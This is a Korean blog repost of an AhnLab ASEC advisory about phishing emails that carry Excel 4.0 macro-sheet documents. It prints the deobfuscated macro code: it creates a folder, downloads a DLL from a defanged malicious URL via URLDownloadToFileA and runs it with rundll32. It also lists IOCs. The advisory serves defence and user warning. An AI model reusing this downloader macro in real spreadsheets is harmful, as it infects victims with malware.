본문 바로가기
뉴스,지식창고/잡지식,추천정보

[AhnLab보안이슈]모르는 사람이 보낸 엑셀 파일 함부로 열지 마세요!

by BumPD 2020. 12. 3.
반응형

모르는 사람이 보낸 엑셀 파일 함부로 열지 마세요!

  • AhnLab
  • 2020-12-02

ASEC 분석팀은 매크로 시트(Excel 4.0 macro sheet)를 이용한 악성 엑셀 문서가 피싱 메일을 통해 국내에 다수 유포되는 것을 확인했다. 해당 메일은 실제 발송된 정상 메일을 활용해 사용자가 악성 여부를 인지하지 못하도록 해 각별한 주의가 요구된다.

악성코드 유포자들은 매크로 시트를 활용한 방식을 자주 사용해오고 있다. 지난 10월 유포된 Qakbot 악성코드에도 이 방법이 사용된 바 있다.

*참고 문서: 급여명세서로 유포 중인 Qakbot 악성코드 (*.xlsb)

아래 그림은 악성코드 유포에 활용된 피싱 메일이다. 이메일에 한국어가 사용된 점을 볼 때 공격 대상에 국내 사용자들도 포함된 것으로 추정된다. 

 

[그림 1] 피싱 메일 

 

[그림 2] 피싱 메일에 활용된 정상 메일

메일에는 압축 파일(ZIP)이 첨부되어 있고, 파일 내부에 악성 엑셀 문서(XLS)가 있다. 

 

[그림 3] 첨부된 악성 문서

사용자가 압축 파일 내 엑셀 문서를 실행하면, 아래와 같이 매크로 사용을 유도하는 문구를 확인할 수 있다. 

 

[그림 4] 악성 엑셀 문서

해당 문서는 매크로 시트를 이용해 난독화된 문자열을 조합 후 악성 행위를 수행한다. 매크로 실행시 자동으로 실행되는 Auto_Open 함수는 아래 위치에 있으며, 값이 공백이기 때문에 다음 행을 실행한다. 

 

[그림 5] Auto_Open 함수

많은 공백을 지나 684 번째 행부터 실제 코드를 실행하게 되며, 숨겨진 시트에 존재하는 문자열들을 이용해 난독화를 해제한다 

 

[그림 6] 실제 실행되는 코드 

 [그림 7] 숨겨진 시트

난독화 해제 후, 최종적으로 실행되는 코드는 아래와 같다. “C:\AutoCadest\AutoCadest2” 경로의 폴더를 생성한 후 악성 URL에 접속해 추가 파일 다운로드를 시도한다. 악성 URL 접속이 성공할 경우 해당 폴더에 ‘Fikast.dll’ 이름으로 파일을 다운로드하며, EXEC 함수를 통해 파일을 실행한다.

 

실행 코드

- REGISTER(“Kernel32”, “CreateDirectoryA”, “JCJ”, “YTYFBFTYYFTDFTYFBYFKYTFBY”, , 1, 9)

- YTYFBFTYYFTDFTYFBYFKYTFBY(“C:\AutoCadest\AutoCadest2”, 0)

- REGISTER(“URLMon”, “URLDownloadToFileA”, “IICCII”, “DFGYUJTYGSRYHEDRTSDGS”, , 0, 0)

- DFGYUJTYGSRYHEDRTSDGS(0, hxxp://angeshemaria.com/gwyzlymd/923753.jpg“, “C:\AutoCadest\AutoCadest2\Fikast.dll“, 0, 0)

- EXEC(“rundll32 C:\AutoCadest\AutoCadest2\Fikast.dll, DllRegisterServer”)

 

사용자들은 이메일 발신자 정보를 철저하게 확인하고, 출처가 불분명한 메일의 첨부파일은 열람을 지양해야 한다.

 

현재 안랩 V3는 해당 악성코드를 다음과 같은 진단명으로 진단하고 있다.

 

[파일 진단]

Downloader/XLS.XLMacro (2020.11.25.07)

[IOC]

56332adb895de05d9378d8de27c2d1ac (XLS)

hxxp://angeshemaria.com/gwyzlymd/923753.jpg

 

매크로 시트를 활용한 악성 엑셀 문서에 대한 자세한 사항은 ASEC 블로그를 통해 확인할 수 있다.

▶ASEC 블로그 바로가기

  • AhnLab 로고
  • ASEC 분석팀

이 정보에 대한 저작권은 AhnLab에 있으며 무단 사용 및 도용을 금합니다.

단, 개인이 비상업적인 목적으로 일부 내용을 사용하는 것은 허용하고 있으나, 이 경우 반드시 출처가 AhnLab임을 밝혀야 합니다.
기업이 이 정보를 사용할 때에는 반드시 AhnLab 의 허가를 받아야 하며, 허가 없이 정보를 이용할 경우 저작권 침해로 간주되어 법적인 제재를 받을 수 있습니다. 자세한 내용은 컨텐츠 이용약관을 참고하시기 바랍니다.

정보 이용 문의 : contents@ahnlab.com

반응형

댓글